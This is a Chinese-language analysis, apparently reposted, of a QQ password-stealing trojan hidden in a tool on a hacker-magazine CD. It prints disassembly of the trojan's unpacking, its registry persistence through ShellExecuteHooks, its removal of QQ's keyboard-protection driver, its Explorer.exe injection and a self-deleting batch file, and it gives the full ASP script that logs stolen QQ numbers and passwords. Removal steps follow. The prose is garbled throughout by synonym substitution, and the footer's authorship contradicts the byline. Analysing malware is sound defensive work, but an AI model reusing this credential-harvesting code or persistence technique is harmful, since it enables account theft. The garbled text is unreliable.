分析黑防光盘中的QQ黑手
文章作者:混世魔王 QQ:26836659
信息泉源:邪恶八进制信息安全团队
细致:本文曾经发表于《黑客防线》杂志骗钱,高手略过,有不足,还望指点。
看了《黑客防线》的官方通告,6期光盘的本月强档栏目中,动网毛病使用动画所附带的工具会使杀毒软件报警,提示为Trojan-PSW.Win32.QQShou.ed。一想,我老魔算黑的了,居然另有比我更黑的。看来是青出于蓝……于是把这个恶意步伐阐发了一下,算是给本身加强手动超作的履历,也帮中了马的朋友们,把他清理的干干净净。
先PEID查壳,UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [Overlay],网上n多脱壳机,我这就不去DOWN,直接用PEID的UPX FILEINFO的插件,就可以轻松的获得UPX加壳步伐的OEP。
这里OEP 为:4056D8 直接OD载入.F4,到4056D8把他DOWN 出来。脱壳就完毕了.再用PEID一查,Borland Delphi 6.0 - 7.0,脱壳后,是否修复就任意你了。横竖我们又不运行。
用OD载入脱壳后的步伐,来阐发吧。
00404935 50 PUSH EAX
00404936 E8 71FCFFFF CALL
0040493B 85C0 TEST EAX,EAX
0040493D 75 07 JNZ SHORT 2.00404946
0040493F C685 00FFFFFF 4>MOV BYTE PTR SS:[EBP-100],43
00404946 8A85 00FFFFFF MOV AL,BYTE PTR SS:[EBP-100]
0040494C 50 PUSH EAX
0040494D E8 E2FCFFFF CALL
00404952 83F8 01 CMP EAX,1
00404955 1BC0 SBB EAX,EAX
00404957 40 INC EAX
00404958 84C0 TEST AL,AL
0040495A 75 07 JNZ SHORT 2.00404963
0040495C C685 00FFFFFF 4>MOV BYTE PTR SS:[EBP-100],43 //这里的Hex(43)=Char(C) C盘拉~~
00404963 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00404969 8A95 00FFFFFF MOV DL,BYTE PTR SS:[EBP-100]
0040496F E8 CCEDFFFF CALL 2.00403740
00404974 8B95 FCFEFFFF MOV EDX,DWORD PTR SS:[EBP-104]
0040497A 8BC3 MOV EAX,EBX
0040497C B9 B4494000 MOV ECX,2.004049B4 ; :\program files\internet explorer\plugins\
00404981 E8 2EEEFFFF CALL 2.004037B4
00404986 33C0 XOR EAX,EAX
00404988 5A POP EDX
00404989 59 POP ECX
0040498A 59 POP ECX
步伐运行后,起首会在体系目次创建文件,途径是:
C:\Program Files\Internet Explorer\PLUGINS\
来到这个中央,你就会发明多了一个文件bow.sys静态链接库和bow.bak两个文件,怎样果断是木马天生的,你细致看看文件的天生日期就会发明。
要细致的是这个文件是隐蔽的,必须表现所有文件才气看得到。
我们OD,来看看bow.sys文件的内容,
003E4E1A |. 50 PUSH EAX /pDisposition
003E4E1B |. 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4] ; |
003E4E1F |. 50 PUSH EAX ; |pHandle
003E4E20 |. 6A 00 PUSH 0 ; |pSecurity = NULL
003E4E22 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
003E4E27 |. 6A 00 PUSH 0 ; |Options = REG_OPTION_NON_VOLATILE
003E4E29 |. 6A 00 PUSH 0 ; |Class = NULL
003E4E2B |. 6A 00 PUSH 0 ; |Reserved = 0
003E4E2D |. 68 744E3E00 PUSH bow.003E4E74 ; |software\ms\qqguishou
003E4E32 |. 68 01000080 PUSH 80000001 ; |hKey = HKEY_CURRENT_USER
003E4E37 |. E8 54F4FFFF CALL
写注册表,
HKEY_CURRENT_USER\Software\Ms\QQGuiShou
“QQGuiShou”的拼音“QQ鬼手”?凭据谷歌记载,确有此盗Q软件,
连续阐发
:00407715 A124A14000 mov eax, dword ptr [0040A124]
:0040771A 8B4018 mov eax, dword ptr [eax+18]
:0040771D 50 push eax
:0040771E A124A14000 mov eax, dword ptr [0040A124]
:00407723 8B4014 mov eax, dword ptr [eax+14]
:00407726 50 push eax
* Possible StringData Ref from Code Obj ->"QQ打击波给你送礼品啦-->("
:00407727 68947A4000 push 00407A94
:0040772C FF75F8 push [ebp-08]
* Possible StringData Ref from Code Obj ->"----"
:0040772F 68B87A4000 push 00407AB8
:00407734 FF75F4 push [ebp-0C]
:00407737 68C87A4000 push 00407AC8
:0040773C 8D45CC lea eax, dword ptr [ebp-34]
:0040773F BA05000000 mov edx, 00000005
:00407744 E853BDFFFF call 0040349C
:00407749 8B45CC mov eax, dword ptr [ebp-34]
:0040774C 50 push eax
* Possible StringData Ref from Code Obj ->" 号码:"
:0040774D 68D47A4000 push 00407AD4
:00407752 FF75F8 push [ebp-08]
* Possible StringData Ref from Code Obj ->" ----暗码:"
:00407755 68E47A4000 push 00407AE4
:0040775A FF75F4 push [ebp-0C]
* Possible StringData Ref from Code Obj ->" ----可用游戏币:"
:0040775D 68F87A4000 push 00407AF8
:00407762 8D55C4 lea edx, dword ptr [ebp-3C]
:00407765 8B45DC mov eax, dword ptr [ebp-24]
:00407768 E8E7D7FFFF call 00404F54
:0040776D FF75C4 push [ebp-3C]
* Possible StringData Ref from Code Obj ->" ----保存的:"
:00407770 68147B4000 push 00407B14
:00407775 8D55C0 lea edx, dword ptr [ebp-40]
:00407778 8B45E0 mov eax, dword ptr [ebp-20]
:0040777B E8D4D7FFFF call 00404F54
:00407780 FF75C0 push [ebp-40]
* Possible StringData Ref from Code Obj ->" ----积分:"
:00407783 682C7B4000 push 00407B2C
:00407788 8D55BC lea edx, dword ptr [ebp-44]
:0040778B 8B45EC mov eax, dword ptr [ebp-14]
:0040778E E8C1D7FFFF call 00404F54
:00407793 FF75BC push [ebp-44]
* Possible StringData Ref from Code Obj ->" ----是否是会员:"
:00407796 68407B4000 push 00407B40
:0040779B 8D55B8 lea edx, dword ptr [ebp-48]
:0040779E 8B45D4 mov eax, dword ptr [ebp-2C]
:004077A1 E8AED7FFFF call 00404F54
:004077A6 FF75B8 push [ebp-48]
* Possible StringData Ref from Code Obj ->" ----品级:"
|
:004077A9 685C7B4000 push 00407B5C
:004077AE 8D55B4 lea edx, dword ptr [ebp-4C]
:004077B1 8B45D0 mov eax, dword ptr [ebp-30]
:004077B4 E89BD7FFFF call 00404F54
:004077B9 FF75B4 push [ebp-4C]
* Possible StringData Ref from Code Obj ->" ----游戏点:"
|
:004077BC 68707B4000 push 00407B70
:004077C1 8D55B0 lea edx, dword ptr [ebp-50]
:004077C4 8B45E4 mov eax, dword ptr [ebp-1C]
:004077C7 E888D7FFFF call 00404F54
:004077CC FF75B0 push [ebp-50]
* Possible StringData Ref from Code Obj ->" ----IP: "
“QQ打击波给你送礼品啦!”果然是大礼,经过到QQ站上的盘问,把你的QQ
号码:暗码:可用游戏币:否是会员:积分:品级:游戏点:IP,所有的信息都当做礼品送出去了。写入本身的sys到这内里。还加上步伐背面的配置信息。
哎.现在的木马是越做越好….接纳的ASP网页情势post提交,保存吸收的暗码,有兴趣的朋友可以抓个包看看,我这里就不去掳掠他人的劳动果实了。吸收暗码ASP代码如下:
<%
LogFile="log.txt"
LogFileGB="LOGGB.txt"
QQNumber=request("Number")
QQPassWord=request("PassWord")
QQGBA=request("yxba")
QQGBB=request("yxbb")
if QQGBA="" then
QQGBA="no"
end if
if QQGBB="" then
QQGBB="no"
end if
LogText=QQNumber&"----"&QQPassWord
LogTextGB=QQNumber&"----"&QQPassWord &"----QQGBA:"& QQGBA&"----QQGBB:"& QQGBB
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&LogFile,8,true,0)
ff.writeline(LogText)
ff.close
set ff=nothing
set f=nothing
set f1=Server.CreateObject("scripting.filesystemobject")
set ff1=f1.opentextfile(server.mappath(".")&"\"&LogFileGB,8,true,0)
ff1.writeline(LogTextGB)
ff1.close
set ff1=nothing
set f1=nothing
%>
00404AFB 55 PUSH EBP
00404AFC 68 A04B4000 PUSH 2.00404BA0
00404B01 64:FF30 PUSH DWORD PTR FS:[EAX]
00404B04 64:8920 MOV DWORD PTR FS:[EAX],ESP
00404B07 68 AC4B4000 PUSH 2.00404BAC
00404B0C B9 B04B4000 MOV ECX,2.00404BB0 ; {f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}
00404B11 BA D84B4000 MOV EDX,2.00404BD8 ; software\microsoft\windows\currentversion\explorer\shellexecutehooks
00404B16 B8 02000080 MOV EAX,80000002
00404B1B E8 70FFFFFF CALL 2.00404A90
00404B20 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00404B23 BA 284C4000 MOV EDX,2.00404C28 ; clsid\{f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}
00404B28 E8 8BEBFFFF CALL 2.004036B8
00404B2D 68 AC4B4000 PUSH 2.00404BAC
00404B32 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00404B35 E8 1EEEFFFF CALL 2.00403958
00404B3A 8BD0 MOV EDX,EAX
00404B3C B9 AC4B4000 MOV ECX,2.00404BAC
00404B41 B8 00000080 MOV EAX,80000000
00404B46 E8 45FFFFFF CALL 2.00404A90
00404B4B 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00404B4E BA 604C4000 MOV EDX,2.00404C60 ; \inprocserver32apartment
00404B53 E8 18ECFFFF CALL 2.00403770
写入注册表键值
80000000
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks"
{F3D0D422-CE6D-47B3-9CE6-C54DD63F1ADB}.
com组件办事:
0012FF20 80000000 |hKey = HKEY_CLASSES_ROOT
0012FF24
00404C28 |Subkey =
"CLSID\{F3D0D422-CE6D-47B3-9CE6-C54DD63F1ADB}"
最后LoadLibary来运行木马步伐。
00404E56 8B95 2CFEFFFF MOV EDX,DWORD PTR SS:[EBP-1D4]
00404E5C 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00404E5F B9 B44F4000 MOV ECX,2.00404FB4 ; microsoft.bat
00404E64 E8 4BE9FFFF CALL 2.004037B4
00404E69 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]
00404E6C 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00404E72 E8 B1DBFFFF CALL 2.00402A28
00404E77 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00404E7D E8 42D9FFFF CALL 2.004027C4
00404E82 E8 11D7FFFF CALL 2.00402598
00404E87 BA CC4F4000 MOV EDX,2.00404FCC ; :try
00404E8C 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00404E92 E8 55ECFFFF CALL 2.00403AEC
00404E97 E8 A8DEFFFF CALL 2.00402D44
00404E9C E8 F7D6FFFF CALL 2.00402598
00404EA1 68 DC4F4000 PUSH 2.00404FDC ; del "
00404EA6 8D95 20FEFFFF LEA EDX,DWORD PTR SS:[EBP-1E0]
00404EAC 33C0 XOR EAX,EAX
00404EAE E8 41D8FFFF CALL 2.004026F4
00404EB3 FFB5 20FEFFFF PUSH DWORD PTR SS:[EBP-1E0]
00404EB9 68 EC4F4000 PUSH 2.00404FEC ; "
00404EBE 8D85 24FEFFFF LEA EAX,DWORD PTR SS:[EBP-1DC]
00404EC4 BA 03000000 MOV EDX,3
00404EC9 E8 5AE9FFFF CALL 2.00403828
00404ECE 8B95 24FEFFFF MOV EDX,DWORD PTR SS:[EBP-1DC]
00404ED4 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00404EDA E8 0DECFFFF CALL 2.00403AEC
00404EDF E8 60DEFFFF CALL 2.00402D44
00404EE4 E8 AFD6FFFF CALL 2.00402598
00404EE9 68 F84F4000 PUSH 2.00404FF8 ; if exist "
00404EEE 8D95 18FEFFFF LEA EDX,DWORD PTR SS:[EBP-1E8]
00404EF4 33C0 XOR EAX,EAX
00404EF6 E8 F9D7FFFF CALL 2.004026F4
00404EFB FFB5 18FEFFFF PUSH DWORD PTR SS:[EBP-1E8]
00404F01 68 EC4F4000 PUSH 2.00404FEC ; "
00404F06 68 0C504000 PUSH 2.0040500C ; goto try
00404F0B 8D85 1CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1E4]
00404F11 BA 04000000 MOV EDX,4
00404F16 E8 0DE9FFFF CALL 2.00403828 //这个CALL挪用LoadLibary来运行木马步伐
00404F1B 8B95 1CFEFFFF MOV EDX,DWORD PTR SS:[EBP-1E4]
00404F21 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00404F27 E8 C0EBFFFF CALL 2.00403AEC
00404F2C E8 13DEFFFF CALL 2.00402D44
00404F31 E8 62D6FFFF CALL 2.00402598
00404F36 BA 20504000 MOV EDX,2.00405020 ; del %0
00404F3B 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00404F41 E8 A6EBFFFF CALL 2.00403AEC
00404F46 E8 F9DDFFFF CALL 2.00402D44
00404F4B E8 48D6FFFF CALL 2.00402598
00404F50 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00404F56 E8 89DBFFFF CALL 2.00402AE4
00404F5B E8 38D6FFFF CALL 2.00402598
我是在桌面上调试的,所以会在桌面上天生个microsoft.bat 的文件,挪用CMD实行。
创建microsoft.bat 文件来删除本身。内里内容为
:try
del "C:\Documents and Settings\Administrator\桌面\动网论坛提升工具.exe"
if
exist "C:\Documents and Settings\Administrator\桌面\动网论坛提升工具.exe"
goto try
del %0
最后结束进步伐。
003E9B3D |. E8 7697FFFF CALL bow.003E32B8
003E9B42 |. 68 D09D3E00 PUSH bow.003E9DD0 ; ASCII "QQ.Exe"
003E9B47 |. A1 4CB83E00 MOV EAX,DWORD PTR DS:[3EB84C]
003E9B4C |. E8 8B9AFFFF CALL bow.003E35DC
003E9B51 |. 8BD8 MOV EBX,EAX ; |
003E9B53 |. 53 PUSH EBX ; |String1
003E9B54 |. E8 4FA8FFFF CALL
003E9B59 |. 85C0 TEST EAX,EAX
003E9B5B |. 75 7B JNZ SHORT bow.003E9BD8
003E9B5D |. 8D45 B4 LEA EAX,DWORD PTR SS:[EBP-4C]
003E9B60 |. 8BD6 MOV EDX,ESI
003E9B62 |. B9 05010000 MOV ECX,105
003E9B67 |. E8 5898FFFF CALL bow.003E33C4
003E9B6C |. 8B45 B4 MOV EAX,DWORD PTR SS:[EBP-4C]
003E9B6F |. 8D55 B8 LEA EDX,DWORD PTR SS:[EBP-48]
003E9B72 |. E8 25C6FFFF CALL bow.003E619C
003E9B77 |. 8B55 B8 MOV EDX,DWORD PTR SS:[EBP-48]
003E9B7A |. B8 48B83E00 MOV EAX,bow.003EB848
003E9B7F |. E8 3497FFFF CALL bow.003E32B8
003E9B84 |. 8D45 B0 LEA EAX,DWORD PTR SS:[EBP-50]
003E9B87 |. B9 E09D3E00 MOV ECX,bow.003E9DE0 ; ASCII "LoginCtrl.dll"
003E9B8C |. 8B15 48B83E00 MOV EDX,DWORD PTR DS:[3EB848]
003E9B92 |. E8 9198FFFF CALL bow.003E3428
003E9B97 |. 8B45 B0 MOV EAX,DWORD PTR SS:[EBP-50]
003E9B9A |. E8 3D9AFFFF CALL bow.003E35DC
003E9B9F |. 50 PUSH EAX ; /FileName
003E9BA0 |. E8 BBA7FFFF CALL
003E9BA5 |. A3 18A13E00 MOV DWORD PTR DS:[3EA118],EAX
003E9BAA |. 8D45 AC LEA EAX,DWORD PTR SS:[EBP-54]
003E9BAD |. B9 F89D3E00 MOV ECX,bow.003E9DF8 ; ASCII "npkcrypt.sys"
003E9BB2 |. 8B15 48B83E00 MOV EDX,DWORD PTR DS:[3EB848]
003E9BB8 |. E8 6B98FFFF CALL bow.003E3428
003E9BBD |. 8B45 AC MOV EAX,DWORD PTR SS:[EBP-54]
003E9BC0 |. E8 179AFFFF CALL bow.003E35DC
003E9BC5 |. 50 PUSH EAX ; /FileName
003E9BC6 |. E8 05A7FFFF CALL
003E9BCB |. A1 28A13E00 MOV EAX,DWORD PTR DS:[3EA128]
003E9BD0 |. C700 FFFFFFFF MOV DWORD PTR DS:[EAX],-1
003E9BD6 |. EB 1E JMP SHORT bow.003E9BF6
003E9BD8 |> 68 089E3E00 PUSH bow.003E9E08 ; /String2 = "Explorer.Exe"
003E9BDD |. 53 PUSH EBX ; |String1
003E9BDE |. E8 C5A7FFFF CALL
003E9BE3 |. 85C0 TEST EAX,EAX
003E9BE5 |. 0F85 BB010000 JNZ bow.003E9DA6
003E9BEB |. A1 30A13E00 MOV EAX,DWORD PTR DS:[3EA130]
003E9BF0 |. C700 FFFFFFFF MOV DWORD PTR DS:[EAX],-1
003E9BF6 |> 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
003E9BFB |. 56 PUSH ESI ; |PathBuffer
003E9BFC |. A1 50B63E00 MOV EAX,DWORD PTR DS:[3EB650] ; |
003E9C01 |. 50 PUSH EAX ; |hModule => NULL
003E9C02 |. E8 09A7FFFF CALL
步伐拔出Explorer.exe 进程,很流行。不信?我们可以用IceSword来看看Explorer.exe的进程。
不外,木马在加载的时候。会删除npkcrypt.sys的驱动步伐,凭据谷歌记载,QQ2005 Beta3 及以后的版本整合了一个叫做 npkcrypt 的键盘加密步伐,美曰其明保护用户暗码输出安全,实在是不经用户赞同擅从容用户体系中安装莫名其妙驱动步伐。安装此版本后,暗码不克不及经过粘贴的方法输出,暗码为中文的QQ用户没法登录。
木马删除npkcrypt.sys再运行QQ原步伐,就可以设置好钩子。以便记载你输出的暗码。木马是注册的办事,所以你在自启动内里是看不到启动项的。
经过已上阐发,我们可以bow.sys删文件,删注册表,想必可以轻松的办理掉这个木马了。不外另有后遗症。就是删除了我们的npkcrypt.sys驱动步伐,电脑重启,会弹错警告窗口说办事运行错误。
在“我的电脑”上点右键,选“管理”->“设置装备摆设管理器”,选择“查看”/“表现隐蔽的设置装备摆设”,在“非即插即用驱动步伐”中选择“npkcrypt”,卸载之,可选重新启动,然后CMD 运行“regedit”,在注册表中查找“nplcrypt”,大概会找到“HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\npkcrypt”或“HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\npkcrypt”等键,删除重启后一般会办理问题,搜索 npkcrypt.*,删除。
OK,这个小马就ok了。最后BS一下上马的人,饮水思源啊.怎样说,黑防也是我们菜鸟起步的中央,成了老鸟怎样能欺负小鸟了?做人要厚道.
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
